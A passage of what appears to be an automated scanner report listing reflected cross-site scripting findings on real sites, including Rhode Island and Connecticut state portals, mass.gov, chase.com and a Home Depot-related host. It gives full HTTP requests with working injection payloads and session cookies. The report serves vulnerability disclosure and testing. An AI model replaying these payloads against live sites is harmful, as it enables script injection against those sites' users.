Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSDTSCTB=AKNKPFLBFPLJPOODINBOEFIF

ActiveFlagCrit=Y&SearchType=E&EntityName=xss&EntitySearchMethod=B&FEIN=&FilingNumber=&IndividualSearchMethod=B&FirstName=&MiddleName=8668e"><script>alert(1)</script>3a488b53b99&LastName=&AgentSearchMethod=B&AgentName=&Address=&Purpose=&lstDisplay=25&DetailId=&Refile=&FormCode=0000160&FilingMethod=I&FilingFee=&ReadFromDB=False&Refreshed=True&OldFEIN=&OldEntityName=&OldFiscal
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:49:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 8555
Content-Type: text/html
Cache-control: private


<HTML>

<HEAD>
<Title>State of Rhode Island and Providence Plantations -&nbsp;Public Browse and Search</title>

<style type="text/css">
.label {
   font-family: "Courier New", Courier, monospac
...[SNIP]...
<input type=hidden name=MiddleName value="8668e"><script>alert(1)</script>3a488b53b99">
...[SNIP]...

3.17. http://ucc.state.ri.us/CorpSearch/CorpSearchEntityList.asp [Purpose parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ucc.state.ri.us
Path:   /CorpSearch/CorpSearchEntityList.asp

Issue detail

The value of the Purpose request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d359"><script>alert(1)</script>3a9aab12ca4 was submitted in the Purpose parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /CorpSearch/CorpSearchEntityList.asp?ReadFromDB=True&UpdateAllowed= HTTP/1.1
Host: ucc.state.ri.us
Proxy-Connection: keep-alive
Referer: http://ucc.state.ri.us/CorpSearch/CorpSearchInput.asp
Content-Length: 448
Cache-Control: max-age=0
Origin: http://ucc.state.ri.us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSDTSCTB=AKNKPFLBFPLJPOODINBOEFIF

ActiveFlagCrit=Y&SearchType=E&EntityName=xss&EntitySearchMethod=B&FEIN=&FilingNumber=&IndividualSearchMethod=B&FirstName=&MiddleName=&LastName=&AgentSearchMethod=B&AgentName=&Address=&Purpose=3d359"><script>alert(1)</script>3a9aab12ca4&lstDisplay=25&DetailId=&Refile=&FormCode=0000160&FilingMethod=I&FilingFee=&ReadFromDB=False&Refreshed=True&OldFEIN=&OldEntityName=&OldFiscalMonth=&OldFiscalDay=&NewFormation=&FilingNum=&BatchNum=&Doc
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:49:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 8555
Content-Type: text/html
Cache-control: private


<HTML>

<HEAD>
<Title>State of Rhode Island and Providence Plantations -&nbsp;Public Browse and Search</title>

<style type="text/css">
.label {
   font-family: "Courier New", Courier, monospac
...[SNIP]...
<input type=hidden name=Purpose value="3d359"><script>alert(1)</script>3a9aab12ca4">
...[SNIP]...

3.18. http://ucc.state.ri.us/CorpSearch/CorpSearchEntityList.asp [SearchType parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ucc.state.ri.us
Path:   /CorpSearch/CorpSearchEntityList.asp

Issue detail

The value of the SearchType request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a8de"><script>alert(1)</script>fed265178c7 was submitted in the SearchType parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /CorpSearch/CorpSearchEntityList.asp?ReadFromDB=True&UpdateAllowed= HTTP/1.1
Host: ucc.state.ri.us
Proxy-Connection: keep-alive
Referer: http://ucc.state.ri.us/CorpSearch/CorpSearchInput.asp
Content-Length: 448
Cache-Control: max-age=0
Origin: http://ucc.state.ri.us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSDTSCTB=AKNKPFLBFPLJPOODINBOEFIF

ActiveFlagCrit=Y&SearchType=E2a8de"><script>alert(1)</script>fed265178c7&EntityName=xss&EntitySearchMethod=B&FEIN=&FilingNumber=&IndividualSearchMethod=B&FirstName=&MiddleName=&LastName=&AgentSearchMethod=B&AgentName=&Address=&Purpose=&lstDisplay=25&DetailId=&Refile=&Form
...[SNIP]...

Response

HTTP/1.1 500 Internal Server Error
Date: Wed, 13 Jul 2011 00:49:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 4846
Content-Type: text/html
Cache-control: private

<Script Language=JavaScript>
alert('System Error: 900105\n\nOur system appears to be experiencing some difficulty at the moment.\n\nPlease try again later or contact technical support for more inform
...[SNIP]...
<input type=hidden name=SearchType value="E2a8de"><script>alert(1)</script>fed265178c7">
...[SNIP]...

3.19. http://ucc.state.ri.us/loginsystem/login.asp [FilingMethod parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ucc.state.ri.us
Path:   /loginsystem/login.asp

Issue detail

The value of the FilingMethod request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6d411"%3balert(1)//2d4c3ef54be was submitted in the FilingMethod parameter. This input was echoed as 6d411";alert(1)//2d4c3ef54be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /loginsystem/login.asp?FilingMethod=6d411"%3balert(1)//2d4c3ef54be HTTP/1.1
Host: ucc.state.ri.us
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSDTSCTB=AKNKPFLBFPLJPOODINBOEFIF

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:48:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 3894
Content-Type: text/html
Expires: Tue, 12 Jul 2011 00:48:22 GMT
Cache-control: no-cache


<SCRIPT LANGUAGE="JavaScript">
// <!--
var Worklist = ""
if (Worklist != "True"){
window.location = "http://ucc.state.ri.us/loginsystem/login_form.asp";
}
if (Worklist == "True"){
window.location = "http://ucc.state.ri.us/loginsystem/login_form.asp?FilingMethod=6d411";alert(1)//2d4c3ef54be&PDF=&FilingTypeCD=&Process=&FilingMethodDate=&BatchNum=&DocumentNum=&SeqNum=";
}
// -->
...[SNIP]...

3.20. http://ucc.state.ri.us/ucc/uccmenu.asp [FilingMethod parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ucc.state.ri.us
Path:   /ucc/uccmenu.asp

Issue detail

The value of the FilingMethod request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ad54"style%3d"x%3aexpression(alert(1))"616bc28074f was submitted in the FilingMethod parameter. This input was echoed as 3ad54"style="x:expression(alert(1))"616bc28074f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /ucc/uccmenu.asp?FilingMethod=I3ad54"style%3d"x%3aexpression(alert(1))"616bc28074f HTTP/1.1
Host: ucc.state.ri.us
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSDTSCTB=AKNKPFLBFPLJPOODINBOEFIF

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:47:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: no-cache
Content-Length: 7353
Content-Type: text/html
Expires: Wed, 13 Jul 2011 00:46:02 GMT
Cache-control: no-cache


<html>
<head>
<script LANGUAGE="JavaScript">
<!--
function ucc3() {
if (document.UCCMenu.UCC3MENU.value=='0') {
alert('You have to select a correct UCC3 type in the list box!');
return false;
...[SNIP]...
<input type="hidden" name="FilingMethod" value="I3ad54"style="x:expression(alert(1))"616bc28074f">
...[SNIP]...

3.21. https://www.chase.com/ccp/index.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.chase.com
Path:   /ccp/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29263"%20a%3db%209ef85dbd58f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 29263" a=b 9ef85dbd58f in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /ccp/index.jsp?pg_name=ccpmapp/smallbusiness/business_banking/page/bb_checking_overview&29263"%20a%3db%209ef85dbd58f=1 HTTP/1.1
Host: www.chase.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45; DCTMSESSION=zrCbTczJG7b5gdC2pkJLRXST1yLZ7DJLL5Mmcv9PzCS1PvTnvVJV!1300205596; s_cc=true; s_sq=jpmcchasecom%3D%2526pid%253Dhttps%25253A//www.chase.com/ccp/index.jsp%25253Fpg_name%25253Dccpmapp/individuals/shared/page/OpenAnAccount%2526oid%253Dhttp%25253A//www.chase.com/ccp/index.jsp%25253Fpg_name%25253Dccpmapp/smallbusiness/business_banking/page/bb_checking_o%2526ot%253DA

Response (redirected)

HTTP/1.1 200 OK
Server: JPMC1.0
Date: Tue, 12 Jul 2011 16:16:49 GMT
Content-length: 12080
Content-type: text/html;charset=UTF-8
CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Connection: close


<html LANG="EN" >


<head>


<link rel='stylesheet' type='text/css' href='/ccpmweb/shared/document/content.css'/>
<script language='Javas
...[SNIP]...
<form name="zipForm" method="post" action="/index.jsp?pg_name=ccpmapp/smallbusiness/business_banking/page/bb_checking_overview&29263" a=b 9ef85dbd58f=1" onsubmit="return validateZip()">
...[SNIP]...

3.22. https://www.chase.com/ccp/index.jsp [targeturl parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.chase.com
Path:   /ccp/index.jsp

Issue detail

The value of the targeturl request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13971"%20a%3db%2077310f0ae36 was submitted in the targeturl parameter. This input was echoed as 13971" a=b 77310f0ae36 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ccp/index.jsp?pg_name=ccpmapp/shared/assets/page/zipcode&targeturl=https%3A%2F%2Fwww.chase.com%3A443%2Findex.jsp%3Fpg_name%3Dccpmapp%2Fsmallbusiness%2Fbusiness_banking%2Fpage%2Fbb_checking_overview13971"%20a%3db%2077310f0ae36 HTTP/1.1
Host: www.chase.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45; DCTMSESSION=zrCbTczJG7b5gdC2pkJLRXST1yLZ7DJLL5Mmcv9PzCS1PvTnvVJV!1300205596; s_cc=true; s_sq=jpmcchasecom%3D%2526pid%253Dhttps%25253A//www.chase.com/ccp/index.jsp%25253Fpg_name%25253Dccpmapp/individuals/shared/page/OpenAnAccount%2526oid%253Dhttp%25253A//www.chase.com/ccp/index.jsp%25253Fpg_name%25253Dccpmapp/smallbusiness/business_banking/page/bb_checking_o%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: JPMC1.0
Date: Tue, 12 Jul 2011 16:16:44 GMT
Content-length: 10005
Content-type: text/html;charset=UTF-8
CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Connection: close


<html LANG="EN" >


<head>


<link rel='stylesheet' type='text/css' href='/ccpmweb/shared/document/content.css'/>
<script language='Javas
...[SNIP]...
<form name="zipForm" method="post" action="/index.jsp?pg_name=ccpmapp/smallbusiness/business_banking/page/bb_checking_overview13971" a=b 77310f0ae36" onsubmit="return validateZip()">
...[SNIP]...

3.23. https://www.chase.com/index.jsp [targeturl parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.chase.com
Path:   /index.jsp

Issue detail

The value of the targeturl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e26b3"%3b99845ba5733 was submitted in the targeturl parameter. This input was echoed as e26b3";99845ba5733 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

POST /index.jsp?pg_name=ccpmapp/smallbusiness/business_banking/page/bb_checking_overview HTTP/1.1
Host: www.chase.com
Connection: keep-alive
Referer: https://www.chase.com/ccp/index.jsp?pg_name=ccpmapp/shared/assets/page/zipcode&targeturl=https%3A%2F%2Fwww.chase.com%3A443%2Findex.jsp%3Fpg_name%3Dccpmapp%2Fsmallbusiness%2Fbusiness_banking%2Fpage%2Fbb_checking_overview
Content-Length: 200
Cache-Control: max-age=0
Origin: https://www.chase.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45; DCTMSESSION=zrCbTczJG7b5gdC2pkJLRXST1yLZ7DJLL5Mmcv9PzCS1PvTnvVJV!1300205596; s_cc=true; s_sq=jpmcchasecom%3D%2526pid%253Dhttps%25253A//www.chase.com/ccp/index.jsp%25253Fpg_name%25253Dccpmapp/individuals/shared/page/OpenAnAccount%2526oid%253Dhttp%25253A//www.chase.com/ccp/index.jsp%25253Fpg_name%25253Dccpmapp/smallbusiness/business_banking/page/bb_checking_o%2526ot%253DA

targeturl=https%253A%252F%252Fwww.chase.com%253A443%252Findex.jsp%253Fpg_name%253Dccpmapp%252Fsmallbusiness%252Fbusiness_banking%252Fpage%252Fbb_checking_overviewe26b3"%3b99845ba5733&zipcode=10011&submit.x=19&submit.y=13

Response

HTTP/1.1 200 OK
Server: JPMC1.0
Date: Tue, 12 Jul 2011 16:28:01 GMT
Content-length: 3744
Content-type: text/html;charset=UTF-8
CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Set-Cookie: DCTMSESSION=QfWyTc2RvFLRQppGpZ6LcpGKfcRny7D80FmKFh1lRBHJGpTCpSvS!792762552; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
>
<html lang="en">
<HEAD>
<TITLE>
</TITLE>
<script language="JavaScript">


//-----------------------------------
...[SNIP]...
11*/
/*Modified for Prod issue 15591751: ref: WO 108711*/
document.location = "https://www.chase.com:443/index.jsp?pg_name=ccpmapp/smallbusiness/business_banking/page/bb_checking_overviewe26b3";99845ba5733";
/*End Modified for Prod issue: ref: WO 108711*/

}

//----------------------------------------------------------------------
function processCookieOnSuccess()
{
DeleteCookiesOnSu
...[SNIP]...

3.24. https://www.chase.com/index.jsp [zipcode parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.chase.com
Path:   /index.jsp

Issue detail

The value of the zipcode request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload d9ea6%3balert(1)//816b0d67af5c2d49c was submitted in the zipcode parameter. This input was echoed as d9ea6;alert(1)//816b0d67af5c2d49c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index.jsp?pg_name=ccpmapp/smallbusiness/business_banking/page/bb_checking_overview&29263=&targeturl=https%253A%252F%252Fwww.chase.com%253A443%252Findex.jsp%253Fpg_name%253Dccpmapp%252Fsmallbusiness%252Fbusiness_banking%252Fpage%252Fbb_checking_overview%252629263%2522%2Ba%253Db%2B9ef85dbd58f%253D1&zipcode=10011d9ea6%3balert(1)//816b0d67af5c2d49c&submit.x=33&submit.y=5 HTTP/1.1
Host: www.chase.com
Connection: keep-alive
Referer: https://www.chase.com/ccp/index.jsp?pg_name=ccpmapp/smallbusiness/business_banking/page/bb_checking_overview&29263%22%20a%3db%209ef85dbd58f=1
Cache-Control: max-age=0
Origin: https://www.chase.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45; DCTMSESSION=zrCbTczJG7b5gdC2pkJLRXST1yLZ7DJLL5Mmcv9PzCS1PvTnvVJV!1300205596; s_cc=true; s_sq=

Response

HTTP/1.1 200 OK
Server: JPMC1.0
Date: Tue, 12 Jul 2011 16:18:26 GMT
Content-length: 3784
Content-type: text/html;charset=UTF-8
CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
>
<html lang="en">
<HEAD>
<TITLE>
</TITLE>
<script language="JavaScript">


//-----------------------------------
...[SNIP]...
s = 60*1000;
///Negative expiration time set for the timeout cookie to make it session cookie
var marketlistExpiration = null ;

SetCookieOnSuccess("chasezip","zipcode=10011d9ea6;alert(1)//816b0d67af5c2d49c&state=NY&county=New York", zipExpiration, "/",".chase.com");


//new cookie code

SetCookieOnSuccess("marketlist","68|90|152|170|198", marketlistExpiration, "/",".chase.com");
...[SNIP]...

3.25. http://www.ct.gov/demhs/site/default.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ct.gov
Path:   /demhs/site/default.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9af27"><script>alert(1)</script>5bc6d1e79b1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /demhs/site/default.asp?9af27"><script>alert(1)</script>5bc6d1e79b1=1 HTTP/1.1
Host: www.ct.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 13 Jul 2011 00:39:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 31253
Content-Type: text/html
Set-Cookie: demhs=SA=False&EA=&SSL=False&F=CE83CBC6&NB=False&II=&ILO=False&FN=Guest&TU=CF83CBC7&CA=CF83CBC7&TC=06105&AN=&AG=&Q=CF83CBC7&PGT=&UA=Guest&LoginJumpBackTo=%2Fdemhs%2Fsite%2Fdefault%2Easp&AA=False; domain=www.ct.gov; path=/demhs
Set-Cookie: demhsNav=; path=/demhs
Set-Cookie: demhsNav%5FGID=; path=/demhs
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML LANG="en-us">
   <DSFHEADER>
   <!--stopindex-->
   <HEAD>

       <!--
           This site was built with PPT DSF Technology
       Dynamic S
...[SNIP]...
<a href="/demhs/site/default.asp?9af27"><script>alert(1)</script>5bc6d1e79b1=1&demhsNav=|42956|">
...[SNIP]...

3.26. http://www.mass.gov/ [L2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mass.gov
Path:   /

Issue detail

The value of the L2 request parameter is copied into the HTML document as text between TITLE tags. The payload 1b834</title><script>alert(1)</script>38aa81172fd was submitted in the L2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?pageID=eopsagencylanding&L=3&sid=Eeops&L0=Home&L1=Public+Safety+Agencies&L2=Massachusetts+Emergency+Management+Agency1b834</title><script>alert(1)</script>38aa81172fd HTTP/1.1
Host: www.mass.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:39:32 GMT
Server: Apache/2.0.46 (Red Hat)
Cache-Control: no-cache, max-age=300
Expires: Wed, 13 Jul 2011 00:44:32 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 9064


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US">
<head>
   <meta http-equiv="Content-Type" content="text/
...[SNIP]...
<title>Massachusetts Emergency Management Agency1b834</title><script>alert(1)</script>38aa81172fd - Executive Office of Public Safety</title>
...[SNIP]...

3.27. http://www.mass.gov/ [L3 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mass.gov
Path:   /

Issue detail

The value of the L3 request parameter is copied into the HTML document as text between TITLE tags. The payload fba97</title><script>alert(1)</script>d6ae32a62b8 was submitted in the L3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?pageID=ocasubtopic&L=4&L0=Home&L1=Consumer&L2=Housing+Information&L3=Foreclosure+Resourcesfba97</title><script>alert(1)</script>d6ae32a62b8&sid=Eoca HTTP/1.1
Host: www.mass.gov
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mass.gov/?pageID=mg2homepage&L=1&L0=Home&sid=massgov2
Cookie: fsr.s={"v":1,"rid":"1310517722924_648675","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","cp":{"massgov2":"Visited","Deas":"No","Eveterans":"No","Eelders":"No","Eeohhs2":"No","Eoca":"No","Dmdaa":"No","Sessex":"No","Cago":"No","Eeops":"Visited","Aosc":"No","Ador":"No","Agov3":"No","Ihqcc":"No","Elwd":"No","Ehed":"No","Smsa":"No","Idppc":"No","Ctre":"No","Eeoe":"No","Eoeea":"No","Dber":"No","Eoaf":"No","Ieth":"No","Fstim":"No"},"pv":2,"to":5,"c":"http://www.mass.gov/","lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0,"f":1310517726738}; __utma=255208596.1158802016.1310517723.1310517723.1310517723.1; __utmb=255208596.2.10.1310517723; __utmc=255208596; __utmz=255208596.1310517723.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:44:56 GMT
Server: Apache/2.0.46 (Red Hat)
Cache-Control: no-cache, max-age=300
Expires: Wed, 13 Jul 2011 00:49:56 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7576


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US">
<head>
   <meta http-equiv="Content-Type" content="text/
...[SNIP]...
<title>Foreclosure Resourcesfba97</title><script>alert(1)</script>d6ae32a62b8 - Office of Consumer Affairs and Business Regulation</title>
...[SNIP]...

3.28. http://www.res-x.com/ws/r2/Resonance.aspx [cb parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.res-x.com
Path:   /ws/r2/Resonance.aspx

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload 89fa3<img%20src%3da%20onerror%3dalert(1)>512095e9e2b was submitted in the cb parameter. This input was echoed as 89fa3<img src=a onerror=alert(1)>512095e9e2b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ws/r2/Resonance.aspx?appid=HOMEDEPOT01&tk=345519762253388&ss=877035136567428&sg=1&pg=800586763303726&bx=true&vr=2.69&sc=search_rr&cu=287408220&ct=&no=3&cb=r1eh89fa3<img%20src%3da%20onerror%3dalert(1)>512095e9e2b&clk=&ur=http%3A//www.homedepot.com/webapp/wcs/stores/servlet/Search%3Fkeyword%3Dxss%26selectedCatgry%3DSEARCH+ALL%26langId%3D-1%26storeId%3D10051%26catalogId%3D10053&plk=202349120;202571062;202349118;202571024;202571026;202571029;202571027;202571025;202571023;202571028;202349088;202349089;202349087;100661424;&rf=http%3A//www.homedepot.com/ HTTP/1.1
Host: www.res-x.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/webapp/wcs/stores/servlet/Search?keyword=xss&selectedCatgry=SEARCH+ALL&langId=-1&storeId=10051&catalogId=10053
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
